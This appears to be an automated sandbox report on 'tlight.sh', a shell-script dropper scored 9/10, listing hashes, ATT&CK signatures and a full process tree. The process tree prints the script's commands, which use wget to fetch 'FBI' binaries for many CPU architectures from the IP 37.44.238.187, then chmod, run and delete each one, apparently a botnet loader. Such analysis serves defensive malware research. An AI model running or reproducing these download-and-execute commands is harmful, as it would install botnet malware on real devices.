54f9d96c9369f699bff8c8ceae4d6f1376616488696be2d361f8c83034eab238

Resubmissions

22-08-2022 17:16

220822-vs7zgsaggj 9

22-08-2022 17:12

22-08-2022 05:59

22-08-2022 02:57

22-08-2022 02:42

Analysis

max time kernel
22154s
max time network
152s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
22-08-2022 02:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tlight.sh
Size

1KB
MD5

894e976a4a3f5e6038168b5c4b78f98d
SHA1

13cd9bc7146037714e546063867353cbb1b6ff03
SHA256

54f9d96c9369f699bff8c8ceae4d6f1376616488696be2d361f8c83034eab238
SHA512

4b3ddf27afd2f04d19d879aedf5e083af6d2511d426b6a9ce991ffcebaa4013890b6ab473c68c36c25717ced8c7ef4e89765fdd8407adc3b00be44256a0f7571

Score

9^/10

discovery

Malware Config

Signatures

Writes file to system bin folder 1 TTPs 1 IoCs

Hijack Execution Flow
T1574

Processes:

cp

description ioc process

/bin/busybox /bin/busybox cp
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.

Dynamic Resolution
T1568

Processes:

description ioc

/etc/resolv.conf /etc/resolv.conf
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Scanning
T1046
Reads runtime system information 1 IoCs
Reads data from /proc virtual filesystem.

Processes:

cp

description ioc process

/proc/filesystems /proc/filesystems cp
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.

Processes:

tlight.shcp

description ioc process

/tmp/tlight.sh /tmp/tlight.sh tlight.sh
/tmp/busybox /tmp/busybox cp

description	ioc	process
/bin/busybox	/bin/busybox	cp

description	ioc
/etc/resolv.conf	/etc/resolv.conf

description	ioc	process
/proc/filesystems	/proc/filesystems	cp

description	ioc	process
/tmp/tlight.sh	/tmp/tlight.sh	tlight.sh
/tmp/busybox	/tmp/busybox	cp

/tmp/tlight.sh
/tmp/tlight.sh wget "http://37.44.238.187/tlight.sh;chmod" 777 tlight.sh
1⤵
- Writes file to tmp directory
PID:577

/bin/cp
cp /bin/busybox /tmp/
2⤵
- Writes file to system bin folder
- Reads runtime system information
- Writes file to tmp directory
PID:578

/usr/bin/wget
wget http://37.44.238.187/FBI.i486
2⤵
PID:579

/bin/chmod
chmod 777 FBI.i486
2⤵
PID:581

./FBI.i486
./FBI.i486 tlight.i486.wget
2⤵
PID:582

/bin/rm
rm -rf FBI.i486
2⤵
PID:583

/usr/bin/wget
wget http://37.44.238.187/FBI.x86_64
2⤵
PID:584

/bin/chmod
chmod 777 FBI.x86_64
2⤵
PID:586

./FBI.x86_64
./FBI.x86_64 tlight.x86_64.wget
2⤵
PID:587

/bin/rm
rm -rf FBI.x86_64
2⤵
PID:593

/usr/bin/wget
wget http://37.44.238.187/FBI.i586
2⤵
PID:598

/bin/chmod
chmod 777 FBI.i586
2⤵
PID:600

./FBI.i586
./FBI.i586 tlight.i586.wget
2⤵
PID:601

/bin/rm
rm -rf FBI.i586
2⤵
PID:602

/usr/bin/wget
wget http://37.44.238.187/FBI.i686
2⤵
PID:603

/bin/chmod
chmod 777 FBI.i686
2⤵
PID:605

./FBI.i686
./FBI.i686 tlight.i686.wget
2⤵
PID:606

/bin/rm
rm -rf FBI.i686
2⤵
PID:612

/usr/bin/wget
wget http://37.44.238.187/FBI.mips
2⤵
PID:613

/bin/chmod
chmod 777 FBI.mips
2⤵
PID:615

./FBI.mips
./FBI.mips tlight.mips.wget
2⤵
PID:616

/bin/rm
rm -rf FBI.mips
2⤵
PID:618

/usr/bin/wget
wget http://37.44.238.187/FBI.mipsel
2⤵
PID:619

/bin/chmod
chmod 777 FBI.mipsel
2⤵
PID:621

./FBI.mipsel
./FBI.mipsel tlight.mipsel.wget
2⤵
PID:622

/bin/rm
rm -rf FBI.mipsel
2⤵
PID:623

/usr/bin/wget
wget http://37.44.238.187/FBI.arm
2⤵
PID:624

/bin/chmod
chmod 777 FBI.arm
2⤵
PID:626

./FBI.arm
./FBI.arm tlight.arm.wget
2⤵
PID:627

/bin/rm
rm -rf FBI.arm
2⤵
PID:629

/usr/bin/wget
wget http://37.44.238.187/FBI.arm5
2⤵
PID:630

/bin/chmod
chmod 777 FBI.arm5
2⤵
PID:632

./FBI.arm5
./FBI.arm5 tlight.arm5.wget
2⤵
PID:633

/bin/rm
rm -rf FBI.arm5
2⤵
PID:635

/usr/bin/wget
wget http://37.44.238.187/FBI.arm6
2⤵
PID:636

/bin/chmod
chmod 777 FBI.arm6
2⤵
PID:638

./FBI.arm6
./FBI.arm6 tlight.arm6.wget
2⤵
PID:639

/bin/rm
rm -rf FBI.arm6
2⤵
PID:641

/usr/bin/wget
wget http://37.44.238.187/FBI.arm7
2⤵
PID:642

/bin/chmod
chmod 777 FBI.arm7
2⤵
PID:644

./FBI.arm7
./FBI.arm7 tlight.arm7.wget
2⤵
PID:645

/bin/rm
rm -rf FBI.arm7
2⤵
PID:647

/usr/bin/wget
wget http://37.44.238.187/FBI.ppc
2⤵
PID:648

/bin/chmod
chmod 777 FBI.ppc
2⤵
PID:650

./FBI.ppc
./FBI.ppc tlight.ppc.wget
2⤵
PID:651

/bin/rm
rm -rf FBI.ppc
2⤵
PID:653

/usr/bin/wget
wget http://37.44.238.187/FBI.m68k
2⤵
PID:654

/bin/chmod
chmod 777 FBI.m68k
2⤵
PID:656

./FBI.m68k
./FBI.m68k tlight.m68k.wget
2⤵
PID:657

/bin/rm
rm -rf FBI.m68k
2⤵
PID:658

/usr/bin/wget
wget http://37.44.238.187/FBI.sh4
2⤵
PID:659

/bin/chmod
chmod 777 FBI.sh4
2⤵
PID:661

./FBI.sh4
./FBI.sh4 tlight.sh4.wget
2⤵
PID:662

/bin/rm
rm -rf FBI.sh4
2⤵
PID:664

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hijack Execution Flow

T1574

Privilege Escalation

Hijack Execution Flow

T1574

Defense Evasion

Hijack Execution Flow

T1574

Credential Access

Discovery

Network Service Scanning

T1046

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads